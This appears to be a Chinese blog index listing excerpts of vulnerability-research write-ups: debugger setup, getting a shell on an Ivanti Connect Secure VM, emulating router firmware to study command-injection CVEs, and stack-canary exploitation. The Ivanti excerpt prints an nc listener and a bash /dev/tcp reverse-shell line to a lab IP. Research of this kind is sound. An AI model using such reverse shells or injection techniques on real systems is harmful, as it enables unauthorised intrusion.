MING

大部分内容是按照以下连接参考配置的，但是在配置过程中出现了一些问题 https://blog.csdn.net/j284886202/article/details/134931709 pwndbg在配置pwndbg时出现了很多这样的报错 在网上查找后没有发现对应的解决办法，将虚拟机开关机，换源后有一次就成功配置好了(具体问题暂时不是很清楚，但是莫名其妙好了) 后续配置好后还是无法进行，查找后发现还有另外两个工具可以先下载下来切换使用 123456789git clone https://github.com/pwndbg/pwndbg.gitgit clone https://github.com/longld/peda.gitgit clone https://github.com/hugsy/gef.git#pwndbg：一个GDB插件，使GDB的调试不那么糟糕#peda：GDB的Python开发开发协助#gef：是一组用于x86/64、ARM、MIPS、PowerPC和SPARC的命令，用于在使用老式GDB时帮助开发人员和反向工程师sudo pip install ke...

实验对象：Ivanti Connect Secure 22.7R2.3[[CVE]]虚拟机下载 环境配置使用vm打开后，配置如下内容对进行配置的ip访问，成功启动 后续我们需要将虚拟机中的文件下载下来首先在这个页面进行等待，直到出现红框中的超时信息，保存快照，挂起虚拟机在虚拟机文件夹中找到对应文件，使用010打开将文件中所有的/home/bin/dsconfig.pl 字符串为 ///////////////bin/sh/home/bin/dsconfig.pl是控制台界面执行时需要调用的脚本文件，替换后等待控制台界面超时后按“回车”，即可获取底层shell成功拿到shell 12nc -lvp 4444 #s宿主机设置监听bash -i >& /dev/tcp/192.168.13.146/4444 0 >&1 #虚拟机反弹shell 为了后续方便操作，我们先反弹shell出来再进行操作 没有python3 ，只有python2，使用python2的 123iptables -L -n #查看当前服务器放行的端口 iptables -A INPUT...

环境[[CVE]][固件下载]https://www.totolink.net/data/upload/20220412/f08f694a4322b1e8463abb3d41d21688.rar)Ubuntu22IDA9.1binwalkqemu[[firmwalker]] 固件模拟binwalk 解包 1binwalk -Me TOTOLINK_C834FR-1C_NR1800X_IP04469_MT7621A_SPI_16M256M_V9.1.0u.6279_B20210910_ALL.web firmwalker 分析 readelf 分析busybox 1readelf -h ./bin/busybox mips架构，小端序 先在宿主机配置网卡，用于后面和qemu模拟出来的虚拟机进行通信 12345sudo brctl addbr virbr0sudo ifconfig virbr0 192.168.2.1/24 upsudo tunctl -t tap0sudo ifconfig tap0 192.168.2.11/24 upsudo brctl addif vi...

[[CVE]]Ubuntu18IDA9.1binwalkqemu[[firmwalker]][固件下载](GL.iNet 固件下载中心 | GL-AX1800 Flint) 固件分析binwalk 解包1binwalk -Me openwrt-ax1800-4.5.16-0321-1711030388.tar 查看文件属性 1busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-arm.so.1, no section header 固件模拟先在宿主机配置网卡，用于后面和qemu模拟出来的虚拟机进行通信 12sudo tunctl -t tap0sudo ifconfig tap0 192.168.3.1/24 up 在模拟前需要先[下载](Index of /~aurel32/qemu/armhf)以下内容 123vmlinuz-3.2.0-4-vexpress linux内核...

[[CVE]][固件下载](D-Link Technical Support](https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8100)Ubuntu18IDA9.1binwalk[[FirmAE]][[firmwalker]] 固件分析固件解包1binwalk -Me DI_8100-16.07.26A1.zip 使用firmwalker进行扫描 1./firmwalker.sh /home/blonet/下载/CVE-2024-7436/_DI_8100-16.07.26A1.zip.extracted/_DI_8100-16.07.26A1.trx.extracted/_8C.extracted/_3F8000.extracted/cpio-root 搜索与jhttp相关的文件 1grep -ir "jhttpd" 分析sbin/rcrc里起的jhttpd服务系统启动过程中会执行名为 init 的程序，这边做了软连接，启动时就会启动rc程序 固件模拟使用FirmAE进行模拟...

[[CVE]][固件下载](D-Link Technical Support)Ubuntu18IDA9.1binwalk[[FirmAE]][[firmwalker]] 固件分析binwalk解包先使用binwalk 查看固件信息 1binwalk DIR823G_V1.0.2B05_20181207.bin Squashfs文件系统再进行解包 1binwalk -Me DIR823G_V1.0.2B05_20181207.bin 我们先来分析etc文件夹中的inittab启动信息我们继续查看rcS文件watchdog应该是一种进程的监控程序，启动1000秒后启动web服务文件goahead ，#boa 是被注释掉的，boa 没有被启动 checksec&file查看文件信息文件为mips，未开启保护 我们使用ida打开goahead文件进行分析 我们着重关注 12if ( sub_423F90() < 0 ) return -1; 中的sub_423F90函数 管理界面初始化函数第14行 sub_416908("adm", 7, 3, ...

[[CVE]]Ubuntu18IDA9.1binwalk[[FirmAE]]固件下载[[firmwalker]] 固件仿真1binwalk -Me DIR825B1_FW210WWB01.bin MIPS架构32位大端序使用[[firmwalker]]进行扫描-root/sbin/httpd为web服务器 1sudo ./run.sh -d dlink DIR825B1_FW210WWB01.bin 使用FirmAE对其进行固件模拟 漏洞分析根据poc漏洞点在httpd文件中得get_ping_app_stat函数中 ping的值是通过sub_412E48函数中的ping_ipaddr进行获取直接赋值给全局变量，没有任何过滤可以对其进行命令注入后续ping的值经过 parse_special_char函数进行处理，parse_special_char是一个外部的函数我们继续进行搜索 12grep -r "parse_special_char" | grep "匹配到二进制文件"#在文件中进行搜索相关的文件 parse_...

[[CVE]] NETGEAR R7800 存在命令注入漏洞环境：Ubuntu 22 IDA 9.1 固件下载 FirmAE binwalk 固件仿真1binwalk -Me R7800-V1.0.2.62.zip 根据poc 漏洞存在于uhttpd文件中，我们使用qemu user mode 仿真对其进行仿真操作 123456/CVE-2020-11790/_R7800-V1.0.2.62.zip.extracted/_R7800-V1.0.2.62.img.extracted#cd 至此处sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*cp `which qemu-arm-static` .sudo chroot . ./qemu-arm-static --strace ./usr/sbin/uhttpd -h /www -r R7800 -f -x /cgi-bin -t 80 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0...

固件下载连接1https://drivers.softpedia.com/dyn-postdownload.php/d27e8410d32cd9de63a3506c47ded1bc/61ff85c5/75eb7/4/1 虚拟机环境ubuntu 18 binwalk 解包1binwalk -Me US_AC15V1.0BR_V15.03.1.16_multi_TD01.rar 使用 qumu 启动 ./bin/httpd 进行固件模拟 1234打开到此处 _US_AC15V1.0BR_V15.03.1.16_multi_TD01.rar.extractedsudo apt install qemu-user-static libc6-arm* libc6-dev-arm*cp /usr/bin/qemu-arm-static .sudo chroot ./ ./qemu-arm-static ./bin/httpd 程序卡在了 Welcome to … 123使用ida打开/_US_AC15V1.0BR_V15.03.1.16_multi_TD01.r...

Stack SmashCanary保护，是在栈上插入一段随机数；进入函数后，也就是call完后会有push ebp，mov ebp，esp，最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次，canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。 Stack Smash 就是利用 canary 检测的机制漏洞将栈上的__libc_argv[0] 内容将其输出 注意在libc2.23 后此机制无法使用1234567891011void __attribute__ ((noreturn)) __stack_chk_fail (void){ __fortify_fail ("stack smashing detected");}void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg){ /* The loop is added only to keep...